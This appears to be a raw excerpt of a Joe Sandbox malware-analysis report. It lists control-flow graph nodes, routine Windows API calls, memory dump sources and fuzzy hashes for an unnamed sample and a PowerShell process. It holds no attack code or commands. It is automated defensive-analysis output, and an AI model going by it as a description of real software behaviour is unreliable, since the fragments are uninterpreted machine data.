26647->26656 26652 14badb9 26651->26652 26653 14baddc 26651->26653 26652->26653 26654 14bafe0 GetModuleHandleW 26652->26654 26653->26648 26655 14bb00d 26654->26655 26655->26648 26657 14baddc 26656->26657 26658 14badb9 26656->26658 26657->26648 26658->26657 26659 14bafe0 GetModuleHandleW 26658->26659 26660 14bb00d 26659->26660 26660->26648 26480 726503b 26481 726504e 26480->26481 26485 7265320 PostMessageW 26481->26485 26487 7265318 PostMessageW 26481->26487 26482 7265071 26486 726538c 26485->26486 26486->26482 26488 726538c 26487->26488 26488->26482 26661 72619d8 26662 7261a20 SetWindowTextW 26661->26662 26663 7261a1a 26661->26663 26664 7261a51 26662->26664 26663->26662 26665 7260858 26666 7260891 26665->26666 26667 7260ac5 26666->26667 26670 7263770 26666->26670 26675 7263780 26666->26675 26671 7263792 SendMessageW 26670->26671 26672 726378e 26670->26672 26674 7263844 26671->26674 26672->26667 26674->26667 26676 726378e 26675->26676 26677 7263792 SendMessageW 26675->26677 26676->26667 26679 7263844 26677->26679 26679->26667

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014BAFFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2592482539.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_14b0000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: dc9705618024ea2c9b3ea93c42819361198ac6458ddac33bd5de046f6ce0e97d
                                                                        • Instruction ID: 8208ee768a8a3e9ce7ddd3b48b698eca9ff3c69188e1959f989ef9a4c41524ae
                                                                        • Opcode Fuzzy Hash: dc9705618024ea2c9b3ea93c42819361198ac6458ddac33bd5de046f6ce0e97d
                                                                        • Instruction Fuzzy Hash: 8C7135B0A00B058FEB24DF2AD48579ABBF5FF48214F10892ED04AD7B60D775E845CBA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 57 14b4248-14b59d9 CreateActCtxA 60 14b59db-14b59e1 57->60 61 14b59e2-14b5a3c 57->61 60->61 68 14b5a4b-14b5a4f 61->68 69 14b5a3e-14b5a41 61->69 70 14b5a51-14b5a5d 68->70 71 14b5a60 68->71 69->68 70->71 73 14b5a61 71->73 73->73
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 014B59C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2592482539.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_14b0000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: d962fcef7c4dba8e445ae33b2f73dd5591442098ea2f49866f2403b601003549
                                                                        • Instruction ID: 73dfcf381ab0aa8f9db385dc0f4b1b31be2305d9137dc4a901cd823e67f0a232
                                                                        • Opcode Fuzzy Hash: d962fcef7c4dba8e445ae33b2f73dd5591442098ea2f49866f2403b601003549
                                                                        • Instruction Fuzzy Hash: 8541D2B0D00719CBDB24CFA9C8847CEFBB5BF49704F60846AD508AB251DB756945CFA0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 74 14b590d-14b5913 75 14b591c-14b59d9 CreateActCtxA 74->75 77 14b59db-14b59e1 75->77 78 14b59e2-14b5a3c 75->78 77->78 85 14b5a4b-14b5a4f 78->85 86 14b5a3e-14b5a41 78->86 87 14b5a51-14b5a5d 85->87 88 14b5a60 85->88 86->85 87->88 90 14b5a61 88->90 90->90
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 014B59C9
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2592482539.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_14b0000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 81eda4490e54ff4b4c3198b236b6a3cee823d0269e0d01e883c9bbc463f20ea4
                                                                        • Instruction ID: 391cbe5483aed67ef59dd37f62450456457bfcc9eb841554eafcd9931406ebc1
                                                                        • Opcode Fuzzy Hash: 81eda4490e54ff4b4c3198b236b6a3cee823d0269e0d01e883c9bbc463f20ea4
                                                                        • Instruction Fuzzy Hash: AE41BEB0D00719CBEB24CFA9C8847CEFBB5BF49304F60846AD508AB265DB756946CF50

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 91 7263780-726378c 92 7263792-7263842 SendMessageW 91->92 93 726378e-7263791 91->93 99 7263844-726384a 92->99 100 726384b-726385f 92->100 99->100
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,?,?), ref: 07263835
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 36d72426ab3fb15363b049fb1fc1648115fc96ab98ab1eade7da86ae47da568f
                                                                        • Instruction ID: 9ea6354d2cd819143f0a0c1bd5fc4a22886cf69f8e5b9cbf2c65e373270e8492
                                                                        • Opcode Fuzzy Hash: 36d72426ab3fb15363b049fb1fc1648115fc96ab98ab1eade7da86ae47da568f
                                                                        • Instruction Fuzzy Hash: E82148B19003099FDB10DFA9C885B9EBFF8EF48320F10846AE419A7751C775A980CBA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 102 72619a8-7261a18 105 7261a20-7261a4f SetWindowTextW 102->105 106 7261a1a-7261a1d 102->106 107 7261a51-7261a57 105->107 108 7261a58-7261a79 105->108 106->105 107->108
                                                                        APIs
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 07261A42
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow
                                                                        • String ID:
                                                                        • API String ID: 530164218-0
                                                                        • Opcode ID: b178e2296c83e326a4a8a10ac4972dc2cd695558a20a2f4c07c13540a02bfb80
                                                                        • Instruction ID: b64adba83af37b9d07d9f6271f352a754d9b003b31e36eb8fbb086a8d3e66435
                                                                        • Opcode Fuzzy Hash: b178e2296c83e326a4a8a10ac4972dc2cd695558a20a2f4c07c13540a02bfb80
                                                                        • Instruction Fuzzy Hash: 71219DB68053898FDB01CFAAD845BDEFFF1AF49220F14809BC454A7652D338A949CF61

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 110 14bb790-14bd714 DuplicateHandle 112 14bd71d-14bd73a 110->112 113 14bd716-14bd71c 110->113 113->112
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014BD646,?,?,?,?,?), ref: 014BD707
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2592482539.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_14b0000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: f83c3d529ab7d3d3e8d096bc248b22f4ff4cfcd7ade4ca89d3c86bac37188b9c
                                                                        • Instruction ID: 9723abbfbf1590d429a4e21e0a919d229d1b1ed874520ae04b292fc131e70d16
                                                                        • Opcode Fuzzy Hash: f83c3d529ab7d3d3e8d096bc248b22f4ff4cfcd7ade4ca89d3c86bac37188b9c
                                                                        • Instruction Fuzzy Hash: 7E21E5B5D002499FDB10CF9AD584ADEBBF4EB48314F14846AE918A3350D378A950CFA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 116 726eae1-726eae4 117 726eae6-726eb11 116->117 118 726eb12-726eb5d PeekMessageW 116->118 117->118 120 726eb66-726eb87 118->120 121 726eb5f-726eb65 118->121 121->120
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0726E702,00000000,00000000,03D141AC,02D305D0), ref: 0726EB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek
                                                                        • String ID:
                                                                        • API String ID: 2222842502-0
                                                                        • Opcode ID: bcfb0396e1a1c0fec6cc0c8970c33e37ea6ac24b8a8ae8c9f343bc8bee974061
                                                                        • Instruction ID: fd2b27756de2969203edb27eb32e01ee34e7bc63b980419e8c65b983e0aae6f5
                                                                        • Opcode Fuzzy Hash: bcfb0396e1a1c0fec6cc0c8970c33e37ea6ac24b8a8ae8c9f343bc8bee974061
                                                                        • Instruction Fuzzy Hash: D12157B5C003499FDB10CF9AC844ADEBBF4FB09324F10806AE964A7251C379A545CF61

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 123 14bd679-14bd714 DuplicateHandle 124 14bd71d-14bd73a 123->124 125 14bd716-14bd71c 123->125 125->124
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,014BD646,?,?,?,?,?), ref: 014BD707
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2592482539.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_14b0000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
                                                                        • API String ID: 3793708945-0
                                                                        • Opcode ID: e1a36d890c5824e8533278f7166704c74483db61d82e75164853ab44132b14e2
                                                                        • Instruction ID: d77f4dae95e4951de9d2b0ded72e4dfa9c455592dd6870fffd6b73d8f72dcc59
                                                                        • Opcode Fuzzy Hash: e1a36d890c5824e8533278f7166704c74483db61d82e75164853ab44132b14e2
                                                                        • Instruction Fuzzy Hash: E721E0B5D002499FDB10CFAAD584AEEBBF5EB48324F14846AE918A3350D378A950CF60

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 128 726c890-726eb5d PeekMessageW 131 726eb66-726eb87 128->131 132 726eb5f-726eb65 128->132 132->131
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0726E702,00000000,00000000,03D141AC,02D305D0), ref: 0726EB50
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePeek
                                                                        • String ID:
                                                                        • API String ID: 2222842502-0
                                                                        • Opcode ID: 89c5b8b4fbc729c8047fba1979d1cd437aaf606f8f448bf1ac8b0ba6b4dc957e
                                                                        • Instruction ID: 98ae6a4dfd29090ff72332cd58dd9f64f9f174eb47770779b5b61dd8fc46c28c
                                                                        • Opcode Fuzzy Hash: 89c5b8b4fbc729c8047fba1979d1cd437aaf606f8f448bf1ac8b0ba6b4dc957e
                                                                        • Instruction Fuzzy Hash: 3711E4B5C102499FDB10CF9AD584BDEBBF8FB48320F11842AE959A3251D378A944CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 134 72619d8-7261a18 135 7261a20-7261a4f SetWindowTextW 134->135 136 7261a1a-7261a1d 134->136 137 7261a51-7261a57 135->137 138 7261a58-7261a79 135->138 136->135 137->138
                                                                        APIs
                                                                        • SetWindowTextW.USER32(?,00000000), ref: 07261A42
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: TextWindow
                                                                        • String ID:
                                                                        • API String ID: 530164218-0
                                                                        • Opcode ID: 3196eacb39019b904bfe14e34d1d3efd19859b541d19119df4b139a0d66b63c9
                                                                        • Instruction ID: df91895cf4f389fe1addeffdf279a2213731263bd8bec15b27f78d6f76d90817
                                                                        • Opcode Fuzzy Hash: 3196eacb39019b904bfe14e34d1d3efd19859b541d19119df4b139a0d66b63c9
                                                                        • Instruction Fuzzy Hash: 8511F6B6C1064A8FDB14CF9AC444BDEFBF4EF48320F14842AD859A7650D378A545CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 140 7265318-726538a PostMessageW 141 7265393-72653b4 140->141 142 726538c-7265392 140->142 142->141
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0726537D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: f8f6bda805f95b7bcdb0c70c1e109097ebf10504e2da3168808c1bd07418ea3b
                                                                        • Instruction ID: a8c330e4243dfc0fc00036dc6d6830d3d19d3d3f3dab6514bf58128a39b75882
                                                                        • Opcode Fuzzy Hash: f8f6bda805f95b7bcdb0c70c1e109097ebf10504e2da3168808c1bd07418ea3b
                                                                        • Instruction Fuzzy Hash: 6F1128B580030A9FDB10CF9AC545BDEFBF8FB48320F10841AE558A7650D378A554CFA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 144 7265320-726538a PostMessageW 145 7265393-72653b4 144->145 146 726538c-7265392 144->146 146->145
                                                                        APIs
                                                                        • PostMessageW.USER32(?,?,?,?), ref: 0726537D
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost
                                                                        • String ID:
                                                                        • API String ID: 410705778-0
                                                                        • Opcode ID: e57268f888d01ef69d1af7099b0b24b89d6951caf94db709efddee8fbad10df6
                                                                        • Instruction ID: 12a3a36d463db4efff8afff7b5639d2674a7368e15507d7adc0cca3860d0c2f5
                                                                        • Opcode Fuzzy Hash: e57268f888d01ef69d1af7099b0b24b89d6951caf94db709efddee8fbad10df6
                                                                        • Instruction Fuzzy Hash: 8D1106B58003499FDB10CF9AC845BDEFBF8EB48320F10841AE958A3650D378A594CFA5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 148 14baf98-14bafd8 149 14bafda-14bafdd 148->149 150 14bafe0-14bb00b GetModuleHandleW 148->150 149->150 151 14bb00d-14bb013 150->151 152 14bb014-14bb028 150->152 151->152
                                                                        APIs
                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014BAFFE
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2592482539.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_14b0000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 93d948d0d9aca124aae7c5b007684add32c8cc7babcd2f0543b7b99f7054bed5
                                                                        • Instruction ID: b3b5ab576a8b369f620a8d5b2ceb1d892c0e7925c06ef2e5571e7d7bb1f8dedc
                                                                        • Opcode Fuzzy Hash: 93d948d0d9aca124aae7c5b007684add32c8cc7babcd2f0543b7b99f7054bed5
                                                                        • Instruction Fuzzy Hash: CD11DFB6C006498FDB14CF9AC444BDEFBF4EB88224F10842AD529A7750D379A545CFA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 154 7265670-7266cca OleInitialize 156 7266cd3-7266cf0 154->156 157 7266ccc-7266cd2 154->157 157->156
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 07266CBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 23ee5e5537b7b65c2c88191819916012e4c63f8e838f7162385d200d3dc20192
                                                                        • Instruction ID: c33dec3d2acde4b1127af4b9d1b98e8cdc1a56f24d60b4ca519e5f6993c83e01
                                                                        • Opcode Fuzzy Hash: 23ee5e5537b7b65c2c88191819916012e4c63f8e838f7162385d200d3dc20192
                                                                        • Instruction Fuzzy Hash: 801130B58107099FCB20DF9AD588BDEFBF8EB48220F20845AD518A3300C378A940CFA4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 160 726c8dc-726f2f2 DispatchMessageW 162 726f2f4-726f2fa 160->162 163 726f2fb-726f30f 160->163 162->163
                                                                        APIs
                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0726E847), ref: 0726F2E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: DispatchMessage
                                                                        • String ID:
                                                                        • API String ID: 2061451462-0
                                                                        • Opcode ID: 27448d3efe3670fb38ba4a2351c549ef1aa8a41b0992c8a4957e8b021341806a
                                                                        • Instruction ID: b1698d8ba79aa7b0bd573b31d907c9822a67493f4c26cbfe48fc5f63f33cc9a8
                                                                        • Opcode Fuzzy Hash: 27448d3efe3670fb38ba4a2351c549ef1aa8a41b0992c8a4957e8b021341806a
                                                                        • Instruction Fuzzy Hash: 3A11EDB5C1464A8FCB10CF9AD548B9EFBF4EB48224F10852AE529A3610D378A544CFA5
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,?,?), ref: 07262015
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: e4fa6ec65c9f76e61bd904bd3c26f50145e309418aaea251eff62309e39c15ac
                                                                        • Instruction ID: 30cf976fe01355289c47e4859a689edfce1b0f60f1892c972f418c5dd8af7a23
                                                                        • Opcode Fuzzy Hash: e4fa6ec65c9f76e61bd904bd3c26f50145e309418aaea251eff62309e39c15ac
                                                                        • Instruction Fuzzy Hash: 5B11E3B58002499FDB10DF99C485BDEFBF8FB48324F10841AD558A7250C375A544CFA1
                                                                        APIs
                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0726E847), ref: 0726F2E5
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: DispatchMessage
                                                                        • String ID:
                                                                        • API String ID: 2061451462-0
                                                                        • Opcode ID: 275444e0c4c5ae84b9afe61fb5660ebb4e52a2019be7e09ab29cec1c25871d37
                                                                        • Instruction ID: 1dd4c4fdee2aba6f8408f461e2d33fcf7ca6b4a4a50b6321893e5a73c710973b
                                                                        • Opcode Fuzzy Hash: 275444e0c4c5ae84b9afe61fb5660ebb4e52a2019be7e09ab29cec1c25871d37
                                                                        • Instruction Fuzzy Hash: E6112EB5C003498FCB20CFAAD448BDEFBF4AB48324F20842AD469A3210C378A540CFA5
                                                                        APIs
                                                                        • SendMessageW.USER32(?,?,?,?), ref: 07262015
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: a84d378f769e6182b1fd83212a3067f77b2f41a971b21e47084b924a7340e8a1
                                                                        • Instruction ID: 259f8716ef99abdac1279baf189fc202abaaa30f5fa15df92c4a72a818353258
                                                                        • Opcode Fuzzy Hash: a84d378f769e6182b1fd83212a3067f77b2f41a971b21e47084b924a7340e8a1
                                                                        • Instruction Fuzzy Hash: 4A11C2B58003499FDB10DF9AC489BDEBBF8EB48324F10841AD558A7650D379A944CFA1
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 07266CBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2612312989.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_7260000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 6aeb87476f4eb69a3359155c82f0b07a270ab2bbfde80154876b9b3d2227fdc3
                                                                        • Instruction ID: 8e1caf4e8545a3f957ab3427931e207a1c3fc6fe3b8d76d921cfcbfd7d78f9ee
                                                                        • Opcode Fuzzy Hash: 6aeb87476f4eb69a3359155c82f0b07a270ab2bbfde80154876b9b3d2227fdc3
                                                                        • Instruction Fuzzy Hash: 621103B58007498FDB20DF9AD549BDEFBF4EB48324F20845AD518A7750C378A644CFA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2589597449.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_f9d000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f02d9c158d39a1ba36e24fc6b59720afdaeb1c2266e081bcea23d12beaf20c2b
                                                                        • Instruction ID: 5bbf7a0746f5d2f990bc2eb2e0a0f0f483cee09aac2a2af395e7f7ce59d23d88
                                                                        • Opcode Fuzzy Hash: f02d9c158d39a1ba36e24fc6b59720afdaeb1c2266e081bcea23d12beaf20c2b
                                                                        • Instruction Fuzzy Hash: 1E212872900344DFEF04DF18D9C0B26BB65FB94324F34C169D9090B256C336E856DBA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2590104644.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_fad000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1029337ecc62d240224b6bcbaed3115584e83164cd40e9bdf4c785abf07d7d84
                                                                        • Instruction ID: f3f4553a68442ed9f0b4841df8fbb91a0fcc5e5377629999b0274d94a099e9ed
                                                                        • Opcode Fuzzy Hash: 1029337ecc62d240224b6bcbaed3115584e83164cd40e9bdf4c785abf07d7d84
                                                                        • Instruction Fuzzy Hash: 922134B2A04340DFDB14DF20D9C0B26BB65FB89324F24C56DD80B4B68AC336D807DA62
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2590104644.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_fad000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ac926a74dd10a86a8020c363fc8774fcdc3478fa3c1d1fc3fe4f341fc58edab
                                                                        • Instruction ID: a4da6536f962ad956039d213ec21204bc3c118f2b2909021fe71c75dc8842b18
                                                                        • Opcode Fuzzy Hash: 1ac926a74dd10a86a8020c363fc8774fcdc3478fa3c1d1fc3fe4f341fc58edab
                                                                        • Instruction Fuzzy Hash: DC2108F2904344DFDF00DF10D9C0B2ABBA5FB85324F24C569D84A4BA82C376D846DAA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2590104644.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_fad000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c024dd47bd427963920d6a02971977a2ff9e530c8019411af2308b26ba6ea9f5
                                                                        • Instruction ID: 20e9ed7ddedf7ad13a1558e93ae026bc40b2f18deb6e1feadc37d515a3eff2c5
                                                                        • Opcode Fuzzy Hash: c024dd47bd427963920d6a02971977a2ff9e530c8019411af2308b26ba6ea9f5
                                                                        • Instruction Fuzzy Hash: D72150755093808FCB12CF24D994715BF71EB46314F28C5EAD8498F6A7C33A984ADB62
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2589597449.0000000000F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_f9d000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                        • Instruction ID: 38684addf60086dc3141612225153f89637e4542ed4ad716e5702fcfd3b2c1dd
                                                                        • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                        • Instruction Fuzzy Hash: 5A11CD72804240CFDF05CF04D5C0B16BF61FB94324F2482A9D8090B656C33AE856DBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2590104644.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_fad000_UNK_.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                                                        • Instruction ID: 0e347753a3dcd4973ee6f7ea32d9e80717b60e1dad59b69e864ab6e6fc560138
                                                                        • Opcode Fuzzy Hash: d692a0047d57c856fe9c281bc03ca2a8a9bd8913fa11d24a2e87d76695bbbe94
                                                                        • Instruction Fuzzy Hash: 3311B2B5904684CFDF11CF10D5C4B5AFB61FB85324F28C6AAD8494BA56C33AD846CB92
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.1564583316.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_75c0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 82bd5517ef002f6ae70b69702790db92ca257f97aaa5749f8c580d02fef3ad30
                                                                        • Instruction ID: 716601003cfe2036c741dd1d6a92ae713b0a5983d595b885fe02857b65ad052e
                                                                        • Opcode Fuzzy Hash: 82bd5517ef002f6ae70b69702790db92ca257f97aaa5749f8c580d02fef3ad30
                                                                        • Instruction Fuzzy Hash: 601236F17047098FDB15DBA8D8117FABBA2AF86211F14C4AFD506CB242DA75C841C7A2
                                                                        Memory Dump Source
